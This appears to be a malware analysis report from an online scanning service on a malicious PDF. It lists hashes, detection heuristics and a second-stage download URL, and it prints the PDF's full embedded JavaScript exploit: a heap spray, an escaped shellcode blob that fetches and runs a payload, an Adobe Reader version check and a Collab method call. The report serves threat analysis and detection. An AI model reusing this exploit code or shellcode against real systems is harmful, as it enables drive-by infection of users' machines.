Malicious PDF — malware analysis report

Static analysis result for SHA-256 b11050f9fbba5fdd…

MALICIOUS

PDF

2.9 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 64f47978262e772a4ddbab3320e8f7c6 SHA-1: 989afac80374286f158faceda2b655be42eed049 SHA-256: b11050f9fbba5fddb9de024bda14b5c9a08ad130440813c471ef2b7130c57c71
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple PDF_JAVASCRIPT and PDF_JS heuristic firings. The presence of PDF_UNESCAPE and the extracted artifact 'javascript_obj0013_001.js' suggest that the JavaScript is obfuscated and likely performs malicious actions such as downloading and executing a second-stage payload. The authoring application 'Scribus' is not inherently malicious, but the combination of PDF structure and obfuscated JavaScript points to a suspicious document.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 7

  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY
    PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
       var jCXXyks0apEMb5 = unescape("%u9090%u9090%u9090%u0FEB%u335B%u66C9%u80B9%u8001%u1133%uE243%uEBFA%uE805%uFFEC%uFFFF%u7581%u21B0%u1111%u9A11%u1D51%u619A%uBC0D%u619A%u9019%u11FD%u1115%u9A11%u47FD%u9F79%u1F5F%uF9FD%u11EF%u1111%u5498%u4715%u8979%u9BEF%uF91F%u11E1%u1111%u5498%u4719%u3479%uEEA1%uF9D3%u11F3%u1111%u5498%u471D%uFE79%uF1DF%uF971%u11C5%u1111%u5498%u4701%uD079%uF468%uF9A9%u11D7%u1111%u5498%u5105%u2991%u64D2%u98EB%u0954%u16F8%u1110%u4F11%u6498%u9A35%u1554%u107B%u9A48%u0944%uF947%u119A%u11 …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://85.17.166.231/gtest2/load.php?id=0&e=01&sid= Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x364 3038 bytes
SHA-256: 35460fe3e559ca27c454c2fcd795045350b3b9a76d2556d5b3f6fbb3b3c91ce9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function DjJmix() {	var pi7gOdduvnlYo = new Array(); 
		function BtrQb(D6OnE882q, semCKA) { 
			while (D6OnE882q.length*2<semCKA){D6OnE882q += D6OnE882q;} 
			D6OnE882q = D6OnE882q.substring(0,semCKA/2);
			return D6OnE882q; 
		}

		function K6llqKaeLTVl6X() { 
			var Ww1P49 = 0x0c0c0c0c; 
			var jCXXyks0apEMb5 = unescape("%u9090%u9090%u9090%u0FEB%u335B%u66C9%u80B9%u8001%u1133%uE243%uEBFA%uE805%uFFEC%uFFFF%u7581%u21B0%u1111%u9A11%u1D51%u619A%uBC0D%u619A%u9019%u11FD%u1115%u9A11%u47FD%u9F79%u1F5F%uF9FD%u11EF%u1111%u5498%u4715%u8979%u9BEF%uF91F%u11E1%u1111%u5498%u4719%u3479%uEEA1%uF9D3%u11F3%u1111%u5498%u471D%uFE79%uF1DF%uF971%u11C5%u1111%u5498%u4701%uD079%uF468%uF9A9%u11D7%u1111%u5498%u5105%u2991%u64D2%u98EB%u0954%u16F8%u1110%u4F11%u6498%u9A35%u1554%u107B%u9A48%u0944%uF947%u119A%u1111%u7941%u0B27%u613E%u86F9%u1111%u9811%u0D54%uD49A%uD192%u9841%u3154%uEE79%u1111%u4111%u549A%u7B05%u4813%u449A%uF909%u1170%u1111%u5412%uD631%u4D11%u3F6F%uD674%u1551%u7469%u1111%u64EE%u9A31%u1D54%u107B%u9A48%u0944%u51F9%u1111%u7B11%u4916%u5412%u2235%u42CA%uEE42%u3164%u4241%u549A%u7B0D%u4814%u449A%uF909%u1132%u1111%u117B%u64EE%u9A31%u1954%u137B%u9A48%u0944%u01F9%u1111%u7B11%u9AEE%u0154%u107B%u9A48%u0944%u11F9%u1111%u5011%u434A%uF012%uF012%uF012%uF012%uFD92%u4B15%u9A42%uF3CB%u43E6%uF1EE%u9A44%u9AFD%u196C%u4C9A%u471D%u629A%u9A2D%u0F65%u1269%u47E2%u679A%u1231%u22E2%u58D8%uBC50%uD212%u2247%u1EE7%u01AF%uE32B%u1965%uDFD0%u121C%u51E3%uE0FA%uEF2A%u644F%u4BF4%uFA9A%u4B9A%u1235%u77CC%u1D9A%u9A5A%u0D4B%uCC12%u159A%u129A%u4FD4%uD34C%u1119%uE5F9%uEEEF%u44EE%u5D43%u5E5C%u115F%u7468%u7074%u2F3A%u382F%u2E35%u3731%u312E%u3636%u322E%u3133%u672F%u6574%u7473%u2F32%u6F6C%u6461%u702E%u7068%u693F%u3D64%u2630%u3D65%u3130%u7326%u6469%u003D");
			var M2vi2Lm0mgMK = 0x400000;
			var c57Uewi2 = jCXXyks0apEMb5.length * 2;
			var semCKA = M2vi2Lm0mgMK - (c57Uewi2+0x38);
			var D6OnE882q = unescape("%u9090%u9090");
			D6OnE882q = BtrQb(D6OnE882q, semCKA);
			var fhjXkOmY9YZ5H = (Ww1P49 - 0x400000)/M2vi2Lm0mgMK;
			
			for (var mj3eEo=0;mj3eEo<fhjXkOmY9YZ5H;mj3eEo++) { 
				pi7gOdduvnlYo[mj3eEo] = D6OnE882q + jCXXyks0apEMb5;
			}
		}

		function e5lBk8VzS() {
			var NwE3f = app.viewerVersion.toString();
			NwE3f = NwE3f.replace(/\D/g,"");
			var STxK1hjmGs = new Array(NwE3f.charAt(0),NwE3f.charAt(1),NwE3f.charAt(2));
			var aEf471t4dJOL = "c8o8l5l555e2c424t234534E6ma45678il31In1f3457o";
			if ((STxK1hjmGs[0] == 8 &&
			((STxK1hjmGs[1] == 1 && STxK1hjmGs[2] < 2) || STxK1hjmGs[1] < 1)) || 
			(STxK1hjmGs[0] == 7 && STxK1hjmGs[1] < 1) || 
			(STxK1hjmGs[0] < 7)) {
			        var tirZO8Ar6V = Collab;
				K6llqKaeLTVl6X();
				var gwdQLhBXRJ4Rl = unescape("%u0c0c%u0c0c");
				var dnozEaclJTLhbV = "c24ol2la572bS8to2445r5e00";
				while(gwdQLhBXRJ4Rl.length < 44952) gwdQLhBXRJ4Rl += gwdQLhBXRJ4Rl;
				this[dnozEaclJTLhbV.replace(new RegExp(/\d/g),"")] = tirZO8Ar6V[aEf471t4dJOL.replace(new RegExp(/\d/g),"")](                  {subj:            "",        msg:              gwdQLhBXRJ4Rl});
			} 
		}
		e5lBk8VzS();}
javascript_obj0013_001_shellcode_00.bin pdf-js-shellcode pdf-js-unescape-shellcode recovered from PDF /JS object 13 at offset 0x364 464 bytes
SHA-256: d792dbee0b7e8970c65ec781f7c0e1244e3d0b09e1740c3fa42d8f511e8b9028

Open this report in the interactive analyzer, or submit your own file for analysis.